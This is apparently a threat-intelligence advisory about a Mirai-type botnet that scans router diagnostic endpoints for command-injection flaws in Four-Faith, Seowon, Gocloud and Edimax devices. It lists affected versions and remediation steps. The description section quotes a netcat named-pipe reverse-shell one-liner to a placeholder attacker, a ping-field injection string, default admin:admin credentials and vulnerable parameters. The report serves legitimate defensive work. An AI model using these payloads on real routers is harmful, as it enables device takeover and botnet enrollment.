Threat reportVulnerabilityTL-2026-1884

Botnet Scanning Internet-Exposed Router Diagnostic Tools Exploiting OS Command Injection (CVE-2024-12856, CVE-2013-7179, CVE-2020-8949, CVE-2024-48419)

highACTIVE

Botnet Scanning Internet-Exposed Router Diagnostic Tools (TL-2026-1884), also tracked as Botnet Hunting for Vulnerabilities in Diagnostic Tools, is a high-severity software vulnerability scored CVSS 8.8, first published 2026-08-05. It has no confirmed attribution, affects Four-Faith F3x24 industrial router, references 4 CVEs (CVE-2024-12856, CVE-2013-7179, CVE-2020-8949), maps to 8 MITRE ATT&CK techniques (T1027, T1046, T1059), and is covered by 9 detection rules and 26 indicators of compromise.

CVSS
8.8/10High
CVEs
4Referenced vulnerabilities
Techniques
8MITRE ATT&CK
Actors
0Not attributed
Detection rules
9SPL · KQL · Sigma
IOCs
26Indicators of compromise

Key facts for TL-2026-1884

Threat ID
TL-2026-1884
Also known as
Botnet Hunting for Vulnerabilities in Diagnostic Tools, Four-Faith router scanning campaign
Severity
HIGH
CVSS
8.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
Status
ACTIVE
Category
VULNERABILITY
First published
Last reviewed
Attribution confidence
MEDIUM
Motivation
FINANCIAL
Target sectors
energy, utilities, manufacturing, transport, telecoms, industrial-control
Target regions
Global, turkey, china, spain, hungary
Detection rules
9
Indicators of compromise
26

Malware and tooling in Botnet Scanning Internet-Exposed Router Diagnostic Tools

Malware and tooling: Mirai, RondoDox, gayfemboy, BusyBox, Mirai, Netcat

How Botnet Scanning Internet-Exposed Router Diagnostic Tools works

A Mirai-based botnet is conducting concentrated HTTP reconnaissance scanning against a fixed set of diagnostic CGI endpoints (/apply.cgi, /cgi-bin/diagnostic.cgi, /diag_ping.cgi, /goform/diagTool, etc.) on internet-exposed routers, hunting for known OS command injection flaws in Four-Faith (CVE-2024-12856), Seowon Intech (CVE-2013-7179), Gocloud (CVE-2020-8949), and Edimax (CVE-2024-48419) devices. Successful compromise spawns a reverse shell and downloads a Mirai-like payload, enrolling the router into a DDoS-capable botnet. The pattern is consistent with the gayfemboy Mirai botnet, which has weaponized CVE-2024-12856 as a zero-day since November 2024 and DDoS-for-profit at ~100 Gbps.

Starting on or around 2026-08-04, SANS ISC (diary #33214) and independent reporting documented a botnet performing systematic HTTP reconnaissance against a tight, fixed set of router diagnostic URLs, each observed served at count=20 in the scan corpus. The targeted endpoints (/apply.cgi, /cgi-bin/adv_ping.cgi, /cgi-bin/diagnostic.cgi, /cgi-bin/DiagnosticsMsg.cgi, /cgi-bin/ping.cgi, /cgi-bin/system_mgr.cgi, /cgi-bin/traceroute.cgi, /diag_ping.cgi, /goform/diagTool, /goform/ping, /ping_test.cgi, /sys_diag.html) all back web-based ping, traceroute, and system-diagnostics utilities. Diagnostic tools of this class are a well-known source of OS command injection because they concatenate user-supplied hostnames directly into shell command strings (e.g., os.system("ping -c 1 -w2 " + hostname)).

The scanning targets four specific command-injection CVEs. CVE-2024-12856 affects Four-Faith F3x24/F3x36 industrial routers at firmware 2.0 via the /apply.cgi adj_time_year parameter (submit_type=adjust_sys_time); the device ships with default admin:admin credentials (HTTP Basic auth, base64 YWRtaW46YWRtaW4=), which effectively converts the post-authentication flaw into unauthenticated remote command injection. Censys identified over 15,000 internet-facing Four-Faith routers, concentrated in Turkey, China, Spain, and Hungary. CVE-2013-7179 affects the Seowon Intech SWC-9100 router and requires no authentication: the ping_ipaddr parameter of cgi-bin/diagnostic.cgi passes user-supplied targets directly into a shell command (PoC injection: 127.0.0.1>/dev/null; ls -lash /etc). CVE-2020-8949 affects multiple Gocloud router models (S2A, S2A_WL, S3A, S3A K2P MTK, ISP3000) via the cgi-bin/webui/admin/tools/app_ping/diag_ping/ ping endpoint. CVE-2024-48419 affects the Edimax BR-6476AC (AC1200) router at firmware 1.06 via three goahead form handlers (/goform/tracerouteDiagnosis, /goform/pingDiagnosis, /goform/fromSysToolPingCmd), allowing injection of arbitrary shell commands as root; the device is end-of-life with no patch expected and has no anti-CSRF protection.

This exploitation pattern is consistent with the gayfemboy Mirai botnet first documented by QiAnXin XLab in February 2024. Gayfemboy weaponized CVE-2024-12856 as a zero-day beginning November 9, 2024 (observed by DucklingStudio honeypots), uploads a custom UPX-packed Mirai payload to compromised routers, and has grown to over 15,000 daily active bot IPs conducting DDoS-for-profit attacks (10-30 second bursts at roughly 100 Gbps). The post-exploitation chain documented in the Four-Faith case uses a named-pipe reverse shell (mknod bOY p; cat bOY|/bin/sh -i 2>&1|nc <attacker> <port> >bOY; rm bOY;) followed by Mirai payload drop. A related Mirai variant, RondoDox (Fortinet), also exploits CVE-2024-12856 and uses a decoded C2 at 83.150.218.93. The botnet's scanning of diagnostic endpoints should be treated as a reliable indicator of targeted command-injection campaigns rather than benign scan noise.

MITRE ATT&CK techniques used in TL-2026-1884

Defense Evasion

T1027 Obfuscated Files or Information

Discovery

T1046 Network Service Discovery

Execution

T1059 Command and Scripting Interpreter

Command and Control

T1071 Application Layer Protocol

Initial Access

T1078 Valid Accounts; T1190 Exploit Public-Facing Application

Resource Development

T1588 Obtain Capabilities

Reconnaissance

T1595 Active Scanning

Affected products and versions in Botnet Scanning Internet-Exposed Router Diagnostic Tools

  • Four-Faith — F3x24 industrial router
    Vulnerable versions: 2.0
  • Four-Faith — F3x36 industrial router
    Vulnerable versions: 2.0
  • Seowon Intech — SWC-9100 router
    Vulnerable versions: all
  • Gocloud — S2A / S2A_WL / S3A / S3A K2P MTK / ISP3000 routers
    Vulnerable versions: 4.2.7.16471; 4.2.7.17278; 4.3.0.15815; 4.3.0.17193; 4.2.7.16528; 4.3.0.16572; 4.3.0.17190
  • Edimax — BR-6476AC (AC1200) router
    Vulnerable versions: 1.06

Remediation for Botnet Scanning Internet-Exposed Router Diagnostic Tools

Patches

  • Four-Faith CVE-2024-12856: no fixed firmware version published as of NVD last-modified 2026-06-17
  • Gocloud CVE-2020-8949: vendor patch status unconfirmed; isolate and monitor
  • Edimax CVE-2024-48419: vendor confirmed end-of-life, NO patch will be issued
  • Seowon CVE-2013-7179: no fixed version indicated in CVE data

Immediate actions

  • Change all default router credentials immediately (admin:admin ships on Four-Faith F3x24/F3x36)
  • Disable WAN-side web administration and remote router diagnostics
  • Restrict diagnostic endpoints (/apply.cgi, /diag_ping.cgi, /goform/diagTool, /cgi-bin/diagnostic.cgi) to trusted management networks via firewall ACLs
  • Block inbound probing of diagnostic CGI paths at the web gateway/WAF

Workarounds

  • Use execv-style argument APIs (subprocess.run with separate args) instead of shell string concatenation in any diagnostic code
  • Rate-limit and log requests to diagnostic CGI endpoints
  • Disable the affected diagnostic tools where they are not required for operations

Longer-term hardening

  • Apply vendor firmware patches for CVE-2024-12856 if/when available
  • Replace end-of-life devices (Edimax BR-6476AC, Seowon SWC-9100) that will never be patched
  • Segment industrial/OT router networks from the general internet
  • Deploy network-based detection for reverse-shell (nc/sh -i) and Mirai payload-download traffic

CVEs associated with Botnet Scanning Internet-Exposed Router Diagnostic Tools

CVE-2024-12856, CVE-2013-7179, CVE-2020-8949, CVE-2024-48419

Weaknesses (CWE) in Botnet Scanning Internet-Exposed Router Diagnostic Tools

CWE-78, CWE-77, CWE-20, CWE-1392, CWE-862

Timeline of Botnet Scanning Internet-Exposed Router Diagnostic Tools

  • CVE-2013-7179 published: Seowon Intech SWC-9100 diagnostic.cgi ping_ipaddr unauthenticated command injection (CERT/CC VU#431726).
  • CVE-2020-8949 published: Gocloud router ping diagnostic command injection.
  • QiAnXin XLab first identifies the gayfemboy Mirai botnet, active with UPX-packed payloads and 20+ exploit modules plus Telnet credential brute force.
  • Gayfemboy begins exploiting the Four-Faith zero-day (later CVE-2024-12856) against F3x24/F3x36 routers, per DucklingStudio honeypots.
  • VulnCheck responsibly notifies Four-Faith and customers of active exploitation of the /apply.cgi adj_time_year command injection.
  • VulnCheck publicly discloses CVE-2024-12856 with Suricata rule (SID 12700438) and reverse-shell PoC; NVD publishes the CVE same day.
  • Gayfemboy botnet resurgence observed by QiAnXin XLab and Security Affairs.
  • CVE-2024-48419 published via SpikeReply advisory: Edimax BR-6476AC goahead command injection; vendor confirmed no patch (end-of-life).
  • FortiGuard Labs observes gayfemboy payloads exploiting multiple vulnerabilities from IP 87.121.84.34.
  • SANS ISC diary #33214 documents a botnet conducting HTTP reconnaissance scanning of 12 router diagnostic URLs at count=20 each, targeting Four-Faith, Seowon, Gocloud, and Edimax command-injection CVEs.
  • GBHackers reports the scanning campaign, confirming the exploitation chain (default creds or unauthenticated injection, reverse shell, Mirai-like payload drop, DDoS botnet enrollment).

Sources cited for Botnet Scanning Internet-Exposed Router Diagnostic Tools

Detection coverage for TL-2026-1884

As of 2026-08-05, Threadlinqs Intelligence publishes 9 detection rule(s) for TL-2026-1884 across Splunk SPL, Microsoft KQL and Sigma, covering 26 indicator(s) of compromise. The whole corpus is readable without an account; a free account unlocks full detection query text in Splunk SPL, Microsoft KQL and Sigma; paid tiers add raw indicator values, correlation and the MCP server. Threadlinqs MCP server · View plans.

9 detection rules (Splunk SPL, Microsoft KQL, Sigma) · Blue and above. Compare plans
26 indicators of compromise · Red and above. Compare plans

Threadlinqs Intelligence — Real-Time Threat Detection Platform

[ 0 threats ] [ 0 det ] [ CRIT: 0 ] [ HIGH: 0 ]
// threat_feed
$ sort --newest
Showing all threats

Live intelligence console

Threat level
Fig. 01 · Threat weatherIndexing the archive…
1 square = 1 threat · click to open

Latest Threats